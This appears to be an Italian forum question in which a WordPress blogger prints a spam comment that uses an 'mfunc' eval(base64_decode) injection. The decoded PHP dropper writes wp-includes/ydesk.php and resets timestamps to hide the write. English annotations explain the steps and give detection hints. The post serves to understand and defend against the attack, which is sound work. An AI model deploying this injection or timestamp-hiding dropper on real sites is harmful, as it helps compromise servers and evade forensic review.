Recentemente Akismet mi ha chiesto di moderare un possibile commento spam sul mio blog.
Era:
<!--mfunc eval(base64_decode("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")); --><!--/mfunc-->
Una volta decodificata, la stringa Base64 diventa:
// Decoded payload of the spam comment: a file dropper that hides its own write
// by restoring modification times afterwards.
// Delivery: the comment wrapped eval(base64_decode(...)) inside an "mfunc" HTML comment.
// NOTE(review): mfunc looks like the dynamic-content tag that some WordPress
// page-caching plugins execute when serving a cached page. Confirm whether such a
// plugin is installed and whether it would process text taken from a comment.

// Target path: wp-includes/ydesk.php under the directory of the script handling the request.
$file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-includes/ydesk.php';
// Content to be written. It is empty in this listing, so as shown the script would
// only create (or truncate) a zero-byte file.
// NOTE(review): the real body may have been stripped from the sample — confirm against the raw comment.
$src = '';
// Save the modification time of the wp-includes directory BEFORE writing,
// because creating a file inside it updates the directory's mtime.
$mtime = filemtime(dirname($file));
// Mode 'w' creates the file if it is missing and truncates it if it exists.
// The fopen() result is not checked, so a non-writable directory makes fwrite()/fclose() fail.
$fh = fopen($file, 'w'); fwrite($fh, $src);
fclose($fh);
// Set the new file's access and modification times to the saved directory mtime,
// so the file does not stand out as recently changed. '@' suppresses any warning.
@touch($file, $mtime, $mtime);
// Put the directory's own mtime back to its pre-write value for the same reason.
@touch(dirname($file), $mtime, $mtime);
// Detection notes: touch() sets only atime and mtime; on Unix-like filesystems the
// inode change time (ctime) still records the real moment of the write. A file in
// wp-includes whose mtime equals the directory's mtime but whose ctime is newer, or
// a file that is not part of the WordPress core checksums, is worth investigating.
// If wp-includes/ydesk.php does not exist, the payload presumably never executed — verify
// with web server logs and a core-file integrity check.
Non riesco a capire cosa stia cercando di fare l'hacker. Qualcuno potrebbe spiegarmi cosa sta succedendo? Non esiste alcuno script ydesk.php.